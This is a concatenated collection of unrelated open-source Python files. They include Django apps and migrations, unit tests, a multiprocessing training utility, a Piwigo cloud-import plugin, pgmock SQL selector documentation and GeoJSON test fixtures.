85aaad8086c1464084670e1d9d0d929b49958353 | 132 | py | Python | zutils/cf_conventions.py | iosonobert/zutils | 02fe9b2c1d1596bf98ee9db2134402517d4a3732 | [
"BSD-2-Clause"
] | null | null | null | zutils/cf_conventions.py | iosonobert/zutils | 02fe9b2c1d1596bf98ee9db2134402517d4a3732 | [
"BSD-2-Clause"
] | 1 | 2021-11-21T05:47:03.000Z | 2021-12-10T00:28:05.000Z | zutils/cf_conventions.py | iosonobert/zutils | 02fe9b2c1d1596bf98ee9db2134402517d4a3732 | [
"BSD-2-Clause"
] | null | null | null | ## KEPT FOR BACK COMPAT
from .pyMOS import *
for i in np.arange(0, 10):
    print('cf_conventions deprecated, use pyMOS instead.')
a44b81be4b5f996c49caae17c4954ab5a2d79374 | 31 | py | Python | ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 308 | 2016-12-07T16:49:27.000Z | 2022-03-15T10:06:45.000Z | ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 1,928 | 2016-11-28T17:13:18.000Z | 2022-03-31T21:43:19.000Z | ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 311 | 2016-11-27T03:01:49.000Z | 2022-03-18T21:34:03.000Z |

# Service info
APP = "vertica"
f110129af89d79bf9ca90e80ac76cb3aa6153784 | 585 | py | Python | joinnector/service/lead_service.py | joinnector/rewardpythonsdk | b0f51023597fc5eb1c3c663d3e53b88598c3ea95 | [
"MIT"
] | null | null | null | joinnector/service/lead_service.py | joinnector/rewardpythonsdk | b0f51023597fc5eb1c3c663d3e53b88598c3ea95 | [
"MIT"
] | null | null | null | joinnector/service/lead_service.py | joinnector/rewardpythonsdk | b0f51023597fc5eb1c3c663d3e53b88598c3ea95 | [
"MIT"
] | null | null | null |

# pylint: disable=useless-super-delegation
from joinnector.service.base_sdk_service import BaseSDKService
class LeadService(BaseSDKService):
    def __init__(self, name):
        super().__init__(name)

    def get_by_customer_id(self, customer_id, swap_id=None):
        return super().get_by("customer_id", customer_id, swap_id)

    def get_by_email(self, email, swap_id=None):
        return super().get_by("email", email, swap_id)

    def get_by_mobile(self, mobile, swap_id=None):
        return super().get_by("mobile", mobile, swap_id)
lead_service = LeadService("lead")
f13bcd20053baa92075a05739364b6b7dd954df4 | 87 | py | Python | BotAPI/apps.py | hanihusam/kitabisa-faqBot-api | e938be93dcb0fd1f8aa70ed31ec78fd6dd769aaf | [
"MIT"
] | null | null | null | BotAPI/apps.py | hanihusam/kitabisa-faqBot-api | e938be93dcb0fd1f8aa70ed31ec78fd6dd769aaf | [
"MIT"
] | null | null | null | BotAPI/apps.py | hanihusam/kitabisa-faqBot-api | e938be93dcb0fd1f8aa70ed31ec78fd6dd769aaf | [
"MIT"
] | 1 | 2021-05-28T03:55:44.000Z | 2021-05-28T03:55:44.000Z |

from django.apps import AppConfig
class BotapiConfig(AppConfig):
    name = 'BotAPI'
f151a37ab8e8d0aaebed15ae6a6151719ffc3011 | 200 | py | Python | stade/core/admin/challenge.py | ImageMarkup/stade | d930e8c7487754b2babd6a3be69f2c614cd7f609 | [
"Apache-2.0"
] | 4 | 2019-09-25T22:57:32.000Z | 2021-03-03T16:49:30.000Z | stade/core/admin/challenge.py | ImageMarkup/stade | d930e8c7487754b2babd6a3be69f2c614cd7f609 | [
"Apache-2.0"
] | 55 | 2019-10-30T16:58:43.000Z | 2021-10-09T23:26:03.000Z | stade/core/admin/challenge.py | ImageMarkup/stade | d930e8c7487754b2babd6a3be69f2c614cd7f609 | [
"Apache-2.0"
] | 1 | 2020-02-03T17:14:32.000Z | 2020-02-03T17:14:32.000Z |

from django.contrib import admin
from stade.core.models import Challenge
from .task import TaskInline
@admin.register(Challenge)
class ChallengeAdmin(admin.ModelAdmin):
    inlines = [TaskInline]
f1536b23646ae8873aeb40a048ca647cac26aaa8 | 304 | py | Python | test/app/api/query/test_common.py | awaisali88/Python-Flask-mongo | 4c7177587a90a109ea16fd8c1ec79ed15dbd35a0 | [
"MIT"
] | 3 | 2021-04-16T09:16:34.000Z | 2021-07-20T19:36:20.000Z | test/app/api/query/test_common.py | fsjunior/python-flask-restful-seed | 1b989d17ac3a0f27cb60be43c5e81310bf8a4c53 | [
"MIT"
] | 10 | 2020-11-03T14:52:24.000Z | 2021-06-28T21:25:05.000Z | test/app/api/query/test_common.py | fsjunior/python-flask-restful-seed | 1b989d17ac3a0f27cb60be43c5e81310bf8a4c53 | [
"MIT"
] | 1 | 2021-08-20T22:58:33.000Z | 2021-08-20T22:58:33.000Z |

import pytest
from app.api.business.common import _validate_objectid
class TestCommon:
    def test_if_valid_object_id(self):
        _validate_objectid("5f960d555042a76847bfa0c8")

    def test_if_invalid_object_id(self):
        with pytest.raises(Exception):
            _validate_objectid("fuba")
# File: tests/data/expected/main/multiple_files_self_ref_single/output.py (adaamz/datamodel-code-generator, MIT)
# generated by datamodel-codegen:
#   filename: test.json
#   timestamp: 2019-07-26T00:00:00+00:00

from __future__ import annotations

from pydantic import BaseModel, Field


class Second(BaseModel):
    __root__: str


class First(BaseModel):
    __root__: Second


class Model(BaseModel):
    test_id: str = Field(..., description='test ID')
    test_ip: First
# File: utils.py (fgerzer/l2rpn_parallel_training, MIT)
import multiprocessing as mp
import os
import queue
import signal

import torch


class BaseCallback:
    def __init__(self, verbose: int = 0):
        self.model = None
        self.verbose = verbose

    def init_callback(self, model):
        self.model = model

    def on_training_start(self):
        pass

    def on_step(self, sim_step, learn_step, **kwargs):
        # If False, break off training
        return True

    def on_training_end(self):
        pass

    def on_evaluation_end(self, sim_step, learn_step, **kwargs):
        return True

    def update_curriculum(self, curriculum):
        pass

    def on_episode_done(self, episode_results):
        pass


class EpisodeResults:
    def __init__(self):
        self.reward = 0
        self.done = False
        self.n_steps = 0
        self.infos = []

    def update(self, step_results):
        self.reward += step_results.reward
        self.done = step_results.done
        self.n_steps = step_results.n_steps
        self.infos.append(step_results.info)


class WorkerCommunication:
    def __init__(self):
        self._model_output_queue = mp.Queue()
        self._observation_queue = mp.Queue()
        self._curriculum_queue = mp.Queue()
        self._event_reset = mp.Event()
        self._event_quit = mp.Event()
        self.pid = None

    def is_interrupted(self):
        return self.is_reset() or self.is_quit()

    def is_reset(self):
        return self._event_reset.is_set()

    def done_reset(self):
        self._event_reset.clear()

    def put_reset(self):
        os.kill(self.pid, signal.SIGUSR1)
        self._event_reset.set()

    def get_curriculum(self, block=False):
        curriculum = None
        try:
            while True:
                curriculum = self._curriculum_queue.get(block=block)
        except queue.Empty:
            pass
        return curriculum

    def put_update_curriculum(self, curriculum):
        self._curriculum_queue.put(curriculum)
        self.put_reset()

    def put_observation(self, observation):
        self._observation_queue.put(observation)

    def get_observation(self, block=True):
        return self._observation_queue.get(block=block)

    def _convert_to_numpy(self, container):
        if isinstance(container, list):
            return [self._convert_to_numpy(c) for c in container]
        elif isinstance(container, dict):
            return {k: self._convert_to_numpy(v) for k, v in container.items()}
        elif isinstance(container, torch.Tensor):
            return container.detach().cpu().numpy()
        return container

    def put_model_output(self, output):
        self._model_output_queue.put(self._convert_to_numpy(output))

    def get_model_output(self, block=True):
        return self._model_output_queue.get(block=block)

    def put_quit(self):
        return self._event_quit.set()

    def is_quit(self):
        # is_set() only queries the flag; calling set() here (as the original
        # did) would raise the quit flag as a side effect of checking it
        return self._event_quit.is_set()


class StepResult:
    def __init__(self, observation, is_reset, action_chosen, reward, done, info, n_steps):
        self.observation = observation
        self.is_reset = is_reset
        self.action_chosen = action_chosen
        self.reward = reward
        self.done = done
        self.info = info
        self.n_steps = n_steps


class EmptyLogger:
    def add_scalar(self, name, value, step, steps_added=1):
        pass

    def add_mean_scalar(self, name, value, step, save_every):
        pass
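`_convert_to_numpy` walks arbitrarily nested lists and dicts and converts only the tensor leaves. The same traversal pattern, with the torch-specific leaf conversion factored out into a callback so this sketch carries no torch dependency, looks like:

```python
def convert_nested(container, convert_leaf):
    # Recursively rebuild nested lists/dicts, applying convert_leaf to every
    # non-container value; mirrors WorkerCommunication._convert_to_numpy,
    # where convert_leaf would be tensor -> detach().cpu().numpy().
    if isinstance(container, list):
        return [convert_nested(c, convert_leaf) for c in container]
    if isinstance(container, dict):
        return {k: convert_nested(v, convert_leaf) for k, v in container.items()}
    return convert_leaf(container)
```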
# File: modoboa/lib/tests/test_web_utils.py (HarshCasper/modoboa, 0BSD)
"""Tests for web_utils."""
from django.test import SimpleTestCase

from .. import web_utils


class TestCase(SimpleTestCase):
    """Test functions."""

    def test_size2integer(self):
        self.assertEqual(web_utils.size2integer("1024"), 1024)
        # Convert to bytes
        self.assertEqual(web_utils.size2integer("1K"), 1024)
        self.assertEqual(web_utils.size2integer("1M"), 1048576)
        self.assertEqual(web_utils.size2integer("1G"), 1073741824)
        # Convert to megabytes
        self.assertEqual(web_utils.size2integer("1K", output_unit="MB"), 0)
        self.assertEqual(web_utils.size2integer("1M", output_unit="MB"), 1)
        self.assertEqual(web_utils.size2integer("1G", output_unit="MB"), 1024)
        # Unsupported unit
        with self.assertRaises(ValueError):
            web_utils.size2integer("1K", output_unit="GB")
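The assertions above pin down the expected behavior of `web_utils.size2integer`. A hypothetical re-implementation consistent with them (modoboa's actual helper may differ in details) is:

```python
def size2integer(value, output_unit="B"):
    # Interpret "K"/"M"/"G" suffixes as binary multiples of bytes; a bare
    # number is already in bytes. output_unit="MB" truncates to whole
    # megabytes; any other non-byte unit is rejected.
    multipliers = {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}
    if value[-1].isdigit():
        nbytes = int(value)
    else:
        nbytes = int(value[:-1]) * multipliers[value[-1].upper()]
    if output_unit == "B":
        return nbytes
    if output_unit == "MB":
        return nbytes // (1024 ** 2)
    raise ValueError("unsupported output unit: %s" % output_unit)
```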
# File: examples/pause.bench.py (noirbizarre/minibench, MIT)
from minibench import Benchmark
import time


class PauseBenchmark(Benchmark):
    times = 10

    def bench_one_hundredth(self):
        time.sleep(.01)

    def bench_one_tenth(self):
        time.sleep(.1)
# File: WebODM-master/plugins/cloudimport/platforms/piwigo.py (abhinavsri000/UAVision, MIT)
# Check http://piwigo.com/
from urllib.parse import urlparse
from os import path

from plugins.cloudimport.cloud_platform import File, Folder
from plugins.cloudimport.extensions.cloud_library import CloudLibrary


class Platform(CloudLibrary):
    def __init__(self):
        super().__init__('Piwigo', 'http://{server_url}/index.php?/category/{category_id}')

    # Cloud Platform
    def platform_file_processing(self, files):
        # Piwigo has the concept of physical albums, which basically expose the
        # actual folders in the file system. So it might happen that, when the
        # File Uploader plugin is used for GCP files, the files need to be
        # renamed to store multiple GCP files. We therefore take any file whose
        # name contains 'gcp_list' and has the extension '.txt' and rename it
        # to 'gcp_list.txt'.
        return [self._map_gcp_file_if_necessary(file) for file in files]

    def get_server_and_folder_id_from_url(self, url):
        parse_result = urlparse(url)
        paths = parse_result.query.split('/')
        if 'category' not in paths or paths.index('category') >= len(paths) - 1:
            raise Exception('Wrong URL format')
        else:
            category_id = paths[paths.index('category') + 1]

        path = parse_result.path
        if 'index.php' not in path:
            raise Exception('Wrong URL format')

        path = path[0:path.index('index.php')]
        server = parse_result.scheme + '://' + parse_result.netloc + '/' + path
        return server, category_id

    def build_folder_api_url(self, server_url, folder_id):
        return '{server_url}/ws.php?format=json&method=pwg.categories.getList&cat_id={folder_id}&recursive=false'.format(server_url=server_url, folder_id=folder_id)

    def parse_payload_into_folder(self, payload):
        result = payload['result']['categories'][0]
        return Folder(result['name'], result['url'], result['nb_images'])

    def build_list_files_in_folder_api_url(self, server_url, folder_id):
        # ToDo: add pagination
        return '{server_url}/ws.php?format=json&method=pwg.categories.getImages&cat_id={folder_id}&recursive=false&per_page=500'.format(server_url=server_url, folder_id=folder_id)

    def parse_payload_into_files(self, payload):
        result = payload['result']
        return [File(image['file'], image['element_url']) for image in result['images']]

    def _map_gcp_file_if_necessary(self, file):
        _, file_extension = path.splitext(file.name)
        if file_extension.lower() == ".txt" and 'gcp_list' in file.name:
            return File('gcp_list.txt', file.url, file.other)
        return file

    # Cloud Library
    def build_folder_list_api_url(self, server_url):
        return '{}/ws.php?format=json&method=pwg.categories.getList&recursive=true&tree_output=true'.format(server_url)

    def parse_payload_into_folders(self, payload):
        categories = payload['result']
        return self._flatten_list([self._build_category(cat) for cat in categories])

    def _build_category(self, category):
        name = category['name']
        images = category['nb_images']
        url = category['url']
        subcategories = self._flatten_list([self._build_category(subcat) for subcat in category['sub_categories']]) if category['nb_categories'] > 0 else []
        for subcategory in subcategories:
            subcategory.name = name + ' > ' + subcategory.name
        folder = [Folder(name, url, images)] if images > 0 else []
        return folder + subcategories

    def _flatten_list(self, list_of_lists):
        return [item for sublist in list_of_lists for item in sublist]
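`get_server_and_folder_id_from_url` splits a Piwigo album URL into the server base and the category id. A standalone sketch of the same parsing logic (the example URL in the test is made up for illustration):

```python
from urllib.parse import urlparse


def parse_piwigo_album_url(url):
    # Mirrors Platform.get_server_and_folder_id_from_url above: the category
    # id lives in the query string ("?/category/<id>") and the server base is
    # everything up to "index.php" in the path.
    parts = urlparse(url)
    segments = parts.query.split("/")
    if "category" not in segments or segments.index("category") >= len(segments) - 1:
        raise ValueError("Wrong URL format")
    category_id = segments[segments.index("category") + 1]
    if "index.php" not in parts.path:
        raise ValueError("Wrong URL format")
    base_path = parts.path[:parts.path.index("index.php")]
    return "{}://{}{}".format(parts.scheme, parts.netloc, base_path), category_id
```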
# File: Python/isPalindrome/palindrometextchecker.py (Wilo/exercises, MIT)
"""
Source: https://en.wikipedia.org/wiki/Palindrome#Names
"""
def is_palindrome(text: str) -> bool:
    return text.lower() == text.lower()[::-1]


if __name__ == '__main__':
    text = input('Give me the text to analyze: ')
    print(f'{text} Is Palindrome?: {is_palindrome(text)}')
# File: tests/output/expected_geojson_output/same_uic_ref_overlapping.py (public-transport-quality-grades/oevgk18-generator, MIT)
result = {
"due-date": "2018-11-13T00:00:00",
"features": [
{
"geometry": {
"coordinates": [
[
[
9.52487,
46.85514
],
[
9.52212,
46.8517
],
[
9.52433,
46.84804
],
[
9.53032,
46.84769
],
[
9.53377,
46.85042
],
[
9.53482,
46.85252
],
[
9.53253,
46.85529
],
[
9.52487,
46.85514
]
]
],
"type": "Polygon"
},
"properties": {
"grade": "B",
"uic_ref": 1
},
"type": "Feature"
},
{
"geometry": {
"coordinates": [
[
[
9.52538,
46.85437
],
[
9.52431,
46.85209
],
[
9.52566,
46.84971
],
[
9.52948,
46.84958
],
[
9.53216,
46.85214
],
[
9.53055,
46.85425
],
[
9.52538,
46.85437
]
]
],
"type": "Polygon"
},
"properties": {
"grade": "A",
"uic_ref": 1
},
"type": "Feature"
}
],
"lower-bound": "06:00",
"type": "FeatureCollection",
"type-of-day": "Working Day",
"type-of-interval": "Day",
"upper-bound": "20:00"
}
# File: coordination/__init__.py (PhobosXIII/qc, Apache-2.0)
default_app_config = 'coordination.apps.CoordinationConfig'
# File: pythia/opal/content/KeyboardAttributes.py (willic3/pythia, BSD-3-Clause)
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class KeyboardAttributes(object):

    def identify(self, inspector):
        return inspector.onKeyboardAttributes(self)

    def __init__(self):
        self.accesskey = ''
        self.tabindex = ''
        return
# version
__id__ = "$Id: KeyboardAttributes.py,v 1.1 2005/03/20 07:22:58 aivazis Exp $"
# End of file
# File: pgmock/selector.py (cwbane/pgmock, BSD-3-Clause)
"""
pgmock.selector
---------------

Contains the primary functionality for chainable SQL selectors
"""
import pgmock.exceptions
import pgmock.mocker
import pgmock.render


def body():
    """Obtains the body of a selector.

    When applicable, this selector returns the body of another selection.
    For example, a ``CREATE TABLE new_table AS SELECT * FROM other_table``
    has a body of ``SELECT * FROM other_table``.

    Returns:
        Selector: A chainable SQL selector.

    Examples:
        Obtain the body of a ``CREATE TABLE AS`` expression

        .. code-block:: python

            body = pgmock.sql(sql_string, pgmock.create_table_as('table').body())

        Obtain the body of an ``INSERT INTO`` expression using the syntax of
        passing multiple selectors to ``pgmock.sql``

        .. code-block:: python

            body = pgmock.sql(sql_string, pgmock.insert_into('table'), pgmock.body())

    Note:
        This selector should only be used to refine another selector, such as
        ``pgmock.create_table_as`` or ``pgmock.insert_into``. In other words, calling:

        .. code-block:: python

            body = pgmock.sql(sql_string, pgmock.body())

        will result in an error.
    """
    return Selector().body()


def statement(start, end=None):
    """Obtains a statement selector.

    Statements are naively parsed by splitting SQL based on the semicolon.
    If any semicolons exist in the comments or literal strings, this
    selector has undefined behavior.

    Args:
        start (int): The starting statement. If ``end`` is ``None``,
            obtain a single statement
        end (int, optional): The ending statement (exclusive)

    Returns:
        Selector: A chainable SQL selector.

    Raises:
        `StatementParseError`: When the statement range is invalid for the
            parsed statements.

    Examples:
        Obtain the first statement in a SQL string

        .. code-block:: python

            statement = pgmock.sql(sql_string, pgmock.statement(0))

        Obtain the second and third statements in a SQL string

        .. code-block:: python

            statement = pgmock.sql(sql_string, pgmock.statement(1, 3))
    """
    return Selector().statement(start, end=end)


def insert_into(table):
    """Obtains a selector for an ``INSERT INTO`` expression.

    Searches for ``INSERT INTO table_name(optional columns)`` and returns
    the entire statement. The body of the statement (e.g. the ``SELECT`` or
    anything after ``INSERT INTO``) can be returned by chaining the ``body()``
    selector.

    Args:
        table (str): The table of the expression.

    Returns:
        Selector: A chainable SQL selector.

    Raises:
        `NoMatchError`: When the expression cannot be found during rendering.
        `MultipleMatchError`: When multiple expressions are found during rendering.

    Examples:
        Obtain the ``INSERT INTO`` of table "t"

        .. code-block:: python

            insert_into = pgmock.sql(sql_string, pgmock.insert_into('t'))

        Obtain the body of the ``INSERT INTO`` of table "t"

        .. code-block:: python

            insert_into_body = pgmock.sql(sql_string, pgmock.insert_into('t').body())

    Note:
        When patching ``INSERT INTO`` statements, the entire body of the
        statement after the ``INSERT INTO`` is patched
    """
    return Selector().insert_into(table)


def cte(alias):
    """Obtains a selector for a common table expression (CTE)

    CTEs are matched by searching for a ``WITH cte_name AS`` or by searching
    for a CTE after a comma (e.g. ``WITH cte_name1 AS ..., cte_name2 AS ...``)

    Args:
        alias (str): The alias of the CTE

    Returns:
        Selector: A chainable SQL selector

    Raises:
        `NoMatchError`: When the CTE cannot be found during rendering.
        `MultipleMatchError`: When multiple CTEs are found during rendering.
        `NestedMatchError`: When nested subquery matches are found during rendering.
        `InvalidSQLError`: When enclosing parentheses for a CTE
            cannot be found.

    Examples:
        Obtain the CTE that has the alias "a"

        .. code-block:: python

            cte = pgmock.sql(sql_string, pgmock.cte('a'))
    """
    return Selector().cte(alias)


def subquery(alias):
    """Obtains a selector for a subquery

    Subqueries are matched by an alias preceded by an enclosing
    parenthesis. Once matched, the SQL is searched for the starting
    parenthesis.

    Args:
        alias (str): The alias of the subquery.

    Returns:
        Selector: A chainable SQL selector.

    Raises:
        `NoMatchError`: When the expression cannot be found during rendering.
        `MultipleMatchError`: When multiple expressions are found during rendering.
        `NestedMatchError`: When nested subquery matches are found during rendering.
        `InvalidSQLError`: When enclosing parentheses for a subquery
            cannot be found.

    Examples:
        Obtain the subquery that has the alias "a"

        .. code-block:: python

            subquery = pgmock.sql(sql_string, pgmock.subquery('a'))

    Todo:
        - Support for subqueries without an alias (e.g. after an "in" keyword)
    """
    return Selector().subquery(alias)


def table(name, alias=None):
    """Obtains a selector for a table

    Tables are matched by searching for their name and optional
    aliases after a ``FROM`` or ``JOIN`` keyword. If the table has an alias
    but the alias isn't provided, a `NoMatchError` will be thrown.

    Args:
        name (str): The name of the table (including the schema if in the query)
        alias (str, optional): The alias of the table if it exists

    Returns:
        Selector: A chainable SQL selector.

    Raises:
        `NoMatchError`: When the expression cannot be found during rendering.
        `MultipleMatchError`: When multiple expressions are found during rendering.

    Examples:
        Obtain the table with no alias that has the name "schema.table_name"

        .. code-block:: python

            table = pgmock.sql(sql_string, pgmock.table('schema.table_name'))

        Obtain the table with the name "schema.table_name" that has the alias "a"

        .. code-block:: python

            table = pgmock.sql(sql_string, pgmock.table('schema.table_name', 'a'))

    Todo:
        - Support lateral joins and other joins that have keywords after
          the ``JOIN`` keyword
    """
    return Selector().table(name, alias=alias)


def create_table_as(table):
    """Obtains a selector for a ``CREATE TABLE AS`` statement.

    Searches for ``CREATE TABLE table_name(optional columns) AS`` and returns
    the entire statement. The body of the statement (e.g. the ``SELECT`` or
    anything after ``CREATE TABLE AS``) can be returned by chaining the
    ``body()`` selector.

    Args:
        table (str): The name of the table as referenced in the expression

    Returns:
        Selector: A chainable SQL selector.

    Raises:
        `NoMatchError`: When the expression cannot be found during rendering.
        `MultipleMatchError`: When multiple expressions are found during rendering.

    Examples:
        Obtain the ``CREATE TABLE AS`` of table "t"

        .. code-block:: python

            ctas = pgmock.sql(sql_string, pgmock.create_table_as('t'))

        Obtain the body of the ``CREATE TABLE AS`` of table "t"

        .. code-block:: python

            ctas_body = pgmock.sql(sql_string, pgmock.create_table_as('t').body())

    Note:
        When patching ``CREATE TABLE AS`` statements, the entire body of the
        statement is patched with a ``SELECT * FROM VALUES ... AS pgmock(columns...)``.
        This is because it is illegal to do ``VALUES ... AS ...`` after a
        "create table as" statement.
    """
    return Selector().create_table_as(table)


class Selector(pgmock.render.Renderable):
    """A selector for targeting expressions in SQL.

    Methods can be chained to represent what is being targeted, for example a
    subquery in the first statement::

        Selector().statement(0).subquery('alias')

    Once ``patch`` is applied to a selector, a ``Mock`` object is returned and
    only ``patch`` can be chained.
    """

    @pgmock.render.Renderable.chainable_render_method
    def __getitem__(self, index):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def statement(self, start, end=None):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def body(self):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def cte(self, alias):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def insert_into(self, table):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def subquery(self, alias):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def table(self, table, alias=None):
        pass

    @pgmock.render.Renderable.chainable_render_method
    def create_table_as(self, table):
        pass

    def patch(self, *args, **kwargs):
        return pgmock.mocker.Mocker(renderable=self).patch(*args, **kwargs)
# File: game/serializers/question_with_answer_serializer.py (dimadk24/english-fight-api, MIT)
from rest_framework import serializers
from game.serializers.question_serializer import QuestionSerializer


class QuestionWithAnswerSerializer(QuestionSerializer):
    correct_answer = serializers.CharField()
# File: music/shape/audio/fourier/coefficient/alpha.py (jedhsu/music, MIT)
"""
*Alpha-Coefficient*
The alpha term in the fourier coefficient.
"""
from ._coefficient import FourierCoefficient
class AlphaCoefficient(
    FourierCoefficient,
):
    pass
# File: testdust/diffusion/__init__.py (ibackus/testdust, MIT)
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This package is for generating and analyzing the dustydiffusion test of
Price & Laibe 2015
Created on Thu Mar 16 16:41:03 2017
@author: ibackus
"""
import makeICs
import analyze
import plot
# File: client/collectors/collector.py (lxy20/django-postgres-stack, BSD-Source-Code)
class MultiCollector(object):
    'a collector combining multiple other collectors'

    def __init__(self):
        self._collectors = {}

    def register(self, name, collector):
        self._collectors[name] = collector

    def start(self):
        for name in self._collectors:
            self._collectors[name].start()

    def stop(self):
        for name in self._collectors:
            self._collectors[name].stop()

    def result(self):
        r = {}
        for name in self._collectors:
            r.update({name: self._collectors[name].result()})
        return r
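A short usage sketch: registering two collectors and fanning out start/stop/result. The `ListCollector` is made up for the example, and `MultiCollector` is repeated so the sketch is self-contained:

```python
# A dummy collector exposing the start/stop/result interface that
# MultiCollector expects from its registered collectors.
class ListCollector(object):
    def __init__(self):
        self.events = []

    def start(self):
        self.events.append('start')

    def stop(self):
        self.events.append('stop')

    def result(self):
        return self.events


# MultiCollector repeated here so the example runs on its own.
class MultiCollector(object):
    def __init__(self):
        self._collectors = {}

    def register(self, name, collector):
        self._collectors[name] = collector

    def start(self):
        for name in self._collectors:
            self._collectors[name].start()

    def stop(self):
        for name in self._collectors:
            self._collectors[name].stop()

    def result(self):
        r = {}
        for name in self._collectors:
            r.update({name: self._collectors[name].result()})
        return r


multi = MultiCollector()
multi.register('a', ListCollector())
multi.register('b', ListCollector())
multi.start()
multi.stop()
results = multi.result()
```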
# File: netmgt/migrations/0001_initial.py (drscream/django-netmgt, BSD-2-Clause)
# Generated by Django 2.2.6 on 2019-10-29 09:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='CachedZone',
            fields=[
                ('key', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
                ('tag', models.CharField(max_length=250)),
                ('value', models.TextField(max_length=250)),
                ('updated', models.DateTimeField()),
            ],
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('nick', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
                ('name', models.CharField(max_length=250)),
                ('email', models.EmailField(max_length=254)),
            ],
        ),
        migrations.CreateModel(
            name='DeviceType',
            fields=[
                ('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='OperatingSystem',
            fields=[
                ('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Template',
            fields=[
                ('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
            ],
        ),
        migrations.CreateModel(
            name='Zone',
            fields=[
                ('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
                ('ttl', models.IntegerField(blank=True, null=True, verbose_name='TTL')),
                ('templates', models.ManyToManyField(blank=True, to='netmgt.Template')),
            ],
        ),
        migrations.CreateModel(
            name='ZoneRecord',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=250)),
                ('ttl', models.IntegerField(blank=True, null=True, verbose_name='TTL')),
                ('type', models.CharField(choices=[('A', 'A'), ('AAAA', 'AAAA'), ('CAA', 'CAA'), ('CERT', 'CERT'), ('CNAME', 'CNAME'), ('DNSKEY', 'DNSKEY'), ('DS', 'DS'), ('KEY', 'KEY'), ('LOC', 'LOC'), ('MX', 'MX'), ('NAPTR', 'NAPTR'), ('NS', 'NS'), ('NSEC', 'NSEC'), ('PTR', 'PTR'), ('RRSIG', 'RRSIG'), ('SPF', 'SPF'), ('SRV', 'SRV'), ('TXT', 'TXT')], max_length=8)),
                ('value', models.CharField(max_length=250)),
                ('zone', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='netmgt.Zone')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='TemplateRecord',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=250)),
                ('ttl', models.IntegerField(blank=True, null=True, verbose_name='TTL')),
                ('type', models.CharField(choices=[('A', 'A'), ('AAAA', 'AAAA'), ('CAA', 'CAA'), ('CERT', 'CERT'), ('CNAME', 'CNAME'), ('DNSKEY', 'DNSKEY'), ('DS', 'DS'), ('KEY', 'KEY'), ('LOC', 'LOC'), ('MX', 'MX'), ('NAPTR', 'NAPTR'), ('NS', 'NS'), ('NSEC', 'NSEC'), ('PTR', 'PTR'), ('RRSIG', 'RRSIG'), ('SPF', 'SPF'), ('SRV', 'SRV'), ('TXT', 'TXT')], max_length=8)),
                ('value', models.CharField(max_length=250)),
                ('template', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='netmgt.Template')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Device',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
                ('info', models.CharField(blank=True, max_length=250)),
                ('contact', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='netmgt.Contact')),
                ('os', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='netmgt.OperatingSystem', verbose_name='Operating System')),
                ('type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='netmgt.DeviceType')),
            ],
        ),
        migrations.CreateModel(
            name='Address',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ip', models.GenericIPAddressField()),
                ('prefix_len', models.IntegerField(verbose_name='Prefix Length')),
                ('name', models.CharField(max_length=250)),
                ('reverse_zone', models.CharField(max_length=250)),
                ('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='netmgt.Device')),
                ('zone', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='netmgt.Zone')),
            ],
        ),
    ]
